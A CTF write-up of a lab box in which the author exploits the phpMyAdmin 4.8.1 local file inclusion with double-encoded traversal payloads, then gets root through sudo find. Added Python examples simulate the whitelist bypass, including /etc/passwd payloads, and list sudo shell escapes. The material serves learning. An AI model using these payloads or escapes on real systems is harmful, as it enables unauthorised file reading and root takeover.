GuidePoint Security CTF 2021 – Jeffrey

~ This is a write-up for a challenge from the
GuidePoint Security CTF event,
held from 22 June until 28 June 2021 ~


The challenge description says I may enumerate the device as I would in a penetration test; tools such as Nmap, Nikto, Dirbuster and Metasploit are allowed.
Well then, let’s hop in!


RECONNAISSANCE


As always in penetration testing, start with Nmap for reconnaissance to find out which ports are open and which services are running on the device.

Here’s the Nmap result :

Only two services are open: SSH and HTTP.
SSH needs valid credentials for the target machine,
and we currently have none.

So let’s check the website (HTTP) first.

On the front page there’s just a smiling Jeffrey GIF 🙂
Let’s look at the source code; maybe something is hidden in there.

At first glance the source code shows nothing interesting.
But the scroll bar at the bottom shows that we can still scroll to the right…

…and there is the first flag >.<
(The flag is hidden by giving it a white font colour.
Back on the front page, pressing Ctrl+A selects all the text
and reveals what is hidden.)

First Flag :

Cool !
Now let’s enumerate the website further.
I use Dirsearch to find hidden directories.

Here’s the result :

Looks like the phpMyAdmin and WordPress directories are accessible!
Let’s focus on phpMyAdmin.


ACCESSING DATABASE


I don’t know the admin’s exact login credentials,
so I try some weak ones,
in case the admin used a weak password.

And we’re in !

On the right, in the “Database Server” column, I spotted the second flag, but the page doesn’t show all of it.
Let’s grab it from the source code.

Second Flag :

As we saw earlier on the phpMyAdmin page,
there is scrolling text above the second flag.
I prefer to read that scrolling text in the source code.

Looking just before the flag, we can see some more information exposed by the service.

Here’s the message…

~ “Aldus, quit using the admin account.
We removed the permissions.
We saved your password at /var/www/aldus.txt” ~

The message says the file “aldus.txt” is located in the /var/www directory.
Of course we can’t fetch that file simply by appending
/aldus.txt to the URL.

For example, this does not work:
http://10.10.10.14/phpmyadmin/aldus.txt
My assumption is that aldus.txt sits in /var/www itself, next to the /html directory that is the web root, so the web server never serves it directly.


VULNERABILITY ANALYSIS


Next I want to know which phpMyAdmin version this is.
Maybe there is a known exploit for that version.

Looking around the phpMyAdmin page,
I scroll down a bit and find the version:

phpMyAdmin
Version information: 4.8.1

To look for an exploit,
I prefer the searchsploit command on Linux.

Let’s examine the first module returned,
using the command below…

~ Here you can see the parts of phpMyAdmin 4.8.1’s “index.php”
that lead to the LFI vulnerability
right here ~

From the Exploit-DB write-up that accompanies the exploit…

…index.php includes a file named by the request parameter “target”,
which is the potential Local File Inclusion vector.

Before the include, $_REQUEST[‘target’] is validated by a function called
Core::checkPageValidity

Now, in the following code…
(which is part of every phpMyAdmin 4.8.1 install…)

This code means…

  • $page is what we supplied in the “target” parameter, and it is compared against the entries of the $whitelist array.
  • The $whitelist parameter defaults to empty (array $whitelist = [ ]).
  • First, if $whitelist is empty, it is replaced by $goto_whitelist and its contents.

and the contents of $goto_whitelist are all these…

I found the list of $goto_whitelist contents above right here.

  • Then, if $page exactly matches one of the $whitelist (now $goto_whitelist) entries, the function returns true.
  • If not, it cuts $page at the first literal “?” and compares the part before it against the whitelist.
  • If that also fails, it runs urldecode() on $page, cuts at the first “?” again, and compares a third time.

In summary, if what comes after the “?target=” parameter matches one of the $goto_whitelist entries, either exactly or after being cut at a “?” (before or after one round of urldecode()), the check returns true.


INITIAL ACCESS


With this “payload”, we can bypass the whitelist check, perform the LFI and read the aldus.txt file.

%253f is the double URL encoding of the “?” character.
PHP decodes the query string once, so the check receives %3f rather than a literal “?”; the first two checks fail, but the third check calls urldecode() itself, turns %3f into “?”, and cuts the value down to the whitelisted file name, so it returns true.
The include, however, still receives the full value with %3f in it, and the ../ sequences after it traverse out of the web root to /var/www/aldus.txt.

I hit Enter, and I got the content of aldus.txt !

If I use another whitelist entry as the prefix, for example “tbl_indexes.php”, the check also returns true and I get the aldus.txt content again.
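To make the whitelist analysis and the payload behaviour above concrete, here is an added example for this write-up (not phpMyAdmin’s code and not the author’s): a Python port of Core::checkPageValidity() from phpMyAdmin 4.8.1 and of the include guard in its index.php, run against constructed payloads to show which of the three checks accepts each one and which path include() ends up resolving. The whitelist is a small subset of the real $goto_whitelist, the DOCROOT install path is an assumption, and the hardened variant is an illustration of the exact-match principle rather than the upstream 4.8.2 patch.

```python
"""Why the target parameter bypasses phpMyAdmin 4.8.1's whitelist.

Added example for this write-up (not phpMyAdmin's code and not the author's):
a Python port of Core::checkPageValidity() from 4.8.1 and of the include
guard in its index.php, run against constructed payloads to show which of
the three checks accepts them and what path include() ends up resolving.
The install path in DOCROOT is an assumption, not taken from the target.
"""
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/html/phpmyadmin"          # assumed, not from the write-up

# Small subset of phpMyAdmin 4.8.1's $goto_whitelist; the real list is long.
GOTO_WHITELIST = [
    "db_sql.php", "db_structure.php", "tbl_indexes.php", "tbl_sql.php",
    "sql.php", "server_sql.php", "index.php",
]
# $target_blacklist from 4.8.1's index.php.
TARGET_BLACKLIST = ["import.php", "export.php"]


def check_page_validity(page, whitelist=GOTO_WHITELIST):
    """Port of Core::checkPageValidity(). Returns the name of the check
    that accepted `page`, or None when all three reject it."""
    if not isinstance(page, str):
        return None
    if page in whitelist:                              # check 1: exact match
        return "exact"
    if page.split("?", 1)[0] in whitelist:             # check 2: cut at '?'
        return "strip-query"
    if unquote(page).split("?", 1)[0] in whitelist:    # check 3: urldecode, cut
        return "urldecode-then-strip"
    return None


def simulate_index_php(raw_target):
    """Model index.php's guard for a raw, still URL-encoded query value.

    Returns (accepting check, normalised include path), or (None, None) when
    the request is rejected. PHP decodes the query string exactly once before
    $_REQUEST['target'] is populated, which is why a double-encoded '?' reaches
    the check as '%3f' and only becomes '?' inside check 3's urldecode()."""
    page = unquote(raw_target)
    if not page or page.startswith("index") or page in TARGET_BLACKLIST:
        return None, None
    check = check_page_validity(page)
    if check is None:
        return None, None
    # include() normalises '..' lexically: the bogus 'db_sql.php%3f' path
    # component never has to exist for the traversal to climb out of DOCROOT.
    return check, posixpath.normpath(posixpath.join(DOCROOT, page))


def hardened_guard(raw_target):
    """Hardened variant (an illustration here, not the upstream 4.8.2 patch):
    a value that will be passed to include() must match the whitelist exactly,
    so no truncation or decoding step can turn a traversal into a match."""
    page = unquote(raw_target)
    return bool(page) and page in GOTO_WHITELIST


# Constructed payloads. The double-encoded form is the one used in the
# write-up; the single-encoded form is accepted as well, by check 2.
PAYLOADS = {
    "legit":  "db_sql.php",
    "double": "db_sql.php%253f/../../../../../var/www/aldus.txt",
    "single": "db_sql.php%3f/../../../../../etc/passwd",
    "other":  "tbl_indexes.php%253f/../../../../../var/www/aldus.txt",
    "nolist": "not_a_page.php%253f/../../../../../etc/passwd",
}

if __name__ == "__main__":
    for name, raw in PAYLOADS.items():
        print(f"{name:6} vulnerable={simulate_index_php(raw)} "
              f"hardened={hardened_guard(raw)}")
```

Running it shows the three outcomes that matter for the write-up: a plain whitelisted name is accepted by the exact-match check and includes the intended script; any whitelisted name followed by an encoded “?” and ../ sequences is accepted by a later check but resolves to a file outside the web root; and a name that is not on the list is rejected whatever follows it. The hardened variant rejects everything except the exact names.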

The file content is base64 encoded; here is the decoded result.

Let’s SSH in as aldus and get the user flag.

Third Flag :


PRIVILEGE ESCALATION


To look for a privilege escalation path,
start with manual enumeration: the “sudo -l” command shows which binaries aldus may run with sudo rights.

The “find” binary is allowed to run as root via sudo with no password (NOPASSWD).
We can use the command from here to escalate privileges.
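The sudo -l triage described above, as an added example for this write-up (not a tool the author used): it parses the “may run the following commands” block of sudo -l output, flags NOPASSWD entries, and maps binaries with a well-known shell escape to the command that drops a root shell. find is the one used in this challenge; its -exec runs the given command as the user running find, which under sudo is root. The few other binaries in the table are the same kind of escape. The sample output is constructed, and the hostname in it is a placeholder.

```python
"""Triage of `sudo -l` output for the privilege-escalation step.

Added example for this write-up, not a tool the author used: parses the
"may run the following commands" block, flags NOPASSWD entries, and maps
binaries with a known shell escape (find, plus a few others of the same
kind) to the command that gives a shell as the RunAs user. The sample
output below is constructed; the hostname and Defaults line are placeholders.
"""
import posixpath
import re

# Binaries whose sudo rights give an interactive shell as the RunAs user.
# `find -exec` is the one used in the write-up; the others follow the same idea.
SHELL_ESCAPES = {
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk": "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "vim": "sudo vim -c ':!/bin/sh'",
    "less": "sudo less /etc/profile   (then type  !/bin/sh  at the prompt)",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
}

# One sudoers rule line as printed by `sudo -l`: (runas) [TAG: ...] cmd[, cmd]
RULE_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sample of what `sudo -l` printed for the low-privileged user.
SAMPLE_SUDO_L = """\
Matching Defaults entries for aldus on target:
    env_reset, mail_badpass

User aldus may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/find
"""


def parse_sudo_l(text):
    """Return one dict per allowed command: runas, nopasswd, command."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True          # rule lines follow this header
            continue
        if not in_commands or not line.strip():
            continue
        m = RULE_RE.match(line.strip())
        if not m:
            continue
        tags = m.group("tags").replace(" ", "").split(":")
        for cmd in m.group("cmds").split(","):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return rules


def find_escapes(rules):
    """Pair each rule whose binary has a known shell escape with the command
    to run. A bare ALL means any command, so plain `sudo /bin/sh` works."""
    hits = []
    for r in rules:
        if r["command"] == "ALL":
            binary, escape = "ALL", "sudo /bin/sh"
        else:
            # Rules may pin arguments; match on the binary's basename only.
            binary = posixpath.basename(r["command"].split()[0])
            escape = SHELL_ESCAPES.get(binary)
        if escape:
            hits.append({**r, "binary": binary, "escape": escape})
    return hits


if __name__ == "__main__":
    for hit in find_escapes(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD" if hit["nopasswd"] else "password required"
        print(f"{hit['command']} as ({hit['runas']}), {tag}: {hit['escape']}")
```

On a real target, pipe the output of `sudo -l` into parse_sudo_l instead of the constructed sample; a NOPASSWD hit on a binary in the table is exactly the situation the write-up exploits with find.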

Now we’re root !

Fourth Flag :

===============================================================

This was a fun challenge! However I’m still learning and there were maybe more efficient ways of attacking this target. Please leave a comment below if you want to share tools or methods that could have been used to solve this challenge.

Thanks to the GuidePoint Security team that made this event possible, especially MaryLou Garcia and Alex Williams! Looking forward to the next event!
